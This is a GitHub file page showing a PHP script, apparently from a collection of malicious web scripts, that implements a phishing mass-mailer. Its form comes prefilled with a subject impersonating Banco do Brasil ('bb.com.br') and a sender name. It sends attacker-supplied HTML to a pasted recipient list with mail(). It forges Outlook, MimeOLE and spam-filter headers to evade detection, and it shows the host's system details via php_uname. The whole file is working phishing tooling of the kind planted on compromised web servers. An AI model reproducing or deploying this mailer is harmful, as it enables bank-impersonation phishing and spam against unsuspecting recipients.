-
Notifications
You must be signed in to change notification settings - Fork 467
/
Unknown_899fc1460693ecdb4d7bf77dc43003476dffdc06.php
159 lines (143 loc) · 5.26 KB
/
Unknown_899fc1460693ecdb4d7bf77dc43003476dffdc06.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
<head>
<title><?php echo $UNAME = @php_uname(); ?></title>
<style type="text/css">
<!--
body {
background-color: #2f4f4f;
}
body, td, th {
color: #ff0000;
font-family: Arial, Helvetica, sans-serif;
font-size: 9px;
}
#form1 #emails {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 9px;
color: #000080;
}
#form1 #Enviar {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
color: #333333;
background-color: #999999;
}
.uaA {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 9px;
}
#form1 #html {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 9px;
color: #FF0000;
}
-->
</style>
</head>
<body style="background-color: #000000">
<label>
<div align="center">
<table width="455" border="4" height="224" bordercolorlight="#000000" bordercolordark="#000000" bgcolor="#000000">
<tr align="center" >
<td width="439" height="220" align="center" bgcolor="#000000"><form action="" method="post" name="form1" class="uaA" id="form1">
<center>
<table align="center" width="439" border="0">
<tr align="center" >
<td align="center" bgcolor="#000000">
<input name="nome" type="text" class="uaA" id="nome" size="60" value="Sandro de paula " /><label><br>
<input name="assunto" type="text" class="uaA" id="assunto" size="60" value="Re: Gerentes de Relacionamento - [bb.com.br] " /><br>
<textarea name="html" cols="60" rows="8" id="html"></textarea><br>
<textarea name="emails" cols="60" rows="8" id="emails"></textarea></td>
<td align="center" bgcolor="#000000" width="4">
</td>
</tr>
<tr align="center" >
<td height="16" align="center" bgcolor="#000000">
<label>
<br>
<input name="remetente" type="text" class="uaA" id="remetente" size="30" value="webmaster.brasil@outlook.com" /> <input name="returpath" type="text" class="uaA" id="returpath" size="30" value="webmaster.brasil@outlook.com" /><br>
<br>
<input name="Enviar" type="submit" id="Enviar"value="Envia" style="float: left; font-weight:700" /></td>
<td height="16" align="center" bgcolor="#000000" width="4"></td>
</tr>
</table>
</form></td>
</tr>
</table>
</div>
<?
//@ignore_user_abort(TRUE);
//error_reporting(0);
//@set_time_limit(0);
//ini_set("memory_limit","-1");
// Pega os valores dos forms para as variáveis.
$enviar = $_POST['Enviar']; // Pega o valor do botão Enviar caso ele seja pressionado.
$remetente = $_POST['remetente']; // Pega o email do remetente.
$nome = $_POST['nome']; // Pega o nome do remetente.
$assunto = $_POST['assunto']; // Pega o assunto.
$e_retorno = $_POST['returpath']; // Pega o email para retornar os erros (Return-Path)
$lista_emails = $_POST['emails']; // Pega a lsita de emails.
$lista_html = $_POST['html']; // Pega os codigos html.
$emails_lista = explode("\n", $lista_emails); // Pegas os emails separados por quebra de linha "\n".
$numemails = count($emails_lista); // Pega a quantidade de emails da lista.
$mensagem = $lista_html;
$mensagem = stripslashes($mensagem);
?>
<table align="center" width="847" border="0" align="center">
<tr>
<td width="841" align="center">
<?php
if ($enviar){
echo ("Msg Enviada");
}
?> </td>
</tr>
</table>
<table align="center" width="294" border="0" align="center" cellspacing="0">
<tr>
<td width="292">
<?
if ($enviar){
$headers .= "MIME-Version: 1.0 \n";
$headers .= "Content-type: text/html; charset=utf-8 \n";
$headers .= "X-Mailer: Microsoft Office Outlook, Build 17.551210 \n";
$headers .= "Message-ID: <".md5(uniqid(time()))."@$MailServer> \n";
$headers .= "X-Priority: 1.0 \n";
$headers .= "Content-Transfer-encoding: 8bit \n";
$headers .= "From: Sandro de paula <webmaster.brasil@outlook.com> \n";
$headers .= "Return-Path: <webmaster.brasil@outlook.com> \n";
$headers .= "Reply-To: Sandro de paula <webmaster.brasil@outlook.com> \n";
$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 \n";
$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081 \n";
$data = date("d/m/Y");
$boundary = rand(1,99009988);
$emails = str_replace("%EMAIL%", $to, $emails);
echo ('Nome do Remetente: ' . $nome . '<br>');
echo ('E-mail do Remetente: ' . $remetente . '<br>');
echo ('Assunto: ' . $assunto . '<br>');
echo ('E-mail de retorno: ' . $e_retorno . '<br>');
echo ('Quantidade de email: ' . $numemails . '<br>');
?>
</td>
</tr>
<tr>
<td>
<?
// Sistema para enviar os emails
for($x=0; $x<$numemails; $x++){
$quanti++;
$email_go = $emails_lista[$x];
$mail = mail($email_go, $assunto.$data, $mensagem.$boundary.$destino, $headers);
if ($mail==1) {
$okenviado++;
echo('<font color="#00ff00">Enviando: ' . $quanti . ' <b>' . $email_go . '</b></font>' . '<font color=blue face=verdana size=1> ok.</font><br>');
} else {
$erroenviado++;
echo('<font color="#00ff00">Não enviado: ' . $quanti . ' <b>' . $email_go . '</b></font>' . '<font color=red face=verdana size=1> erro </font><br>');
sleep(1);}
}
echo('<font color="#0033FF" size="1" face="Verdana, Arial, Helvetica, sans-serif"></font><br>');
echo ('Total de E-mals enviados com sucesso: ' . $okenviado . '<br>');
echo ('Total de E-mails não enviados: ' . $erroenviado . '<br>');
}
?>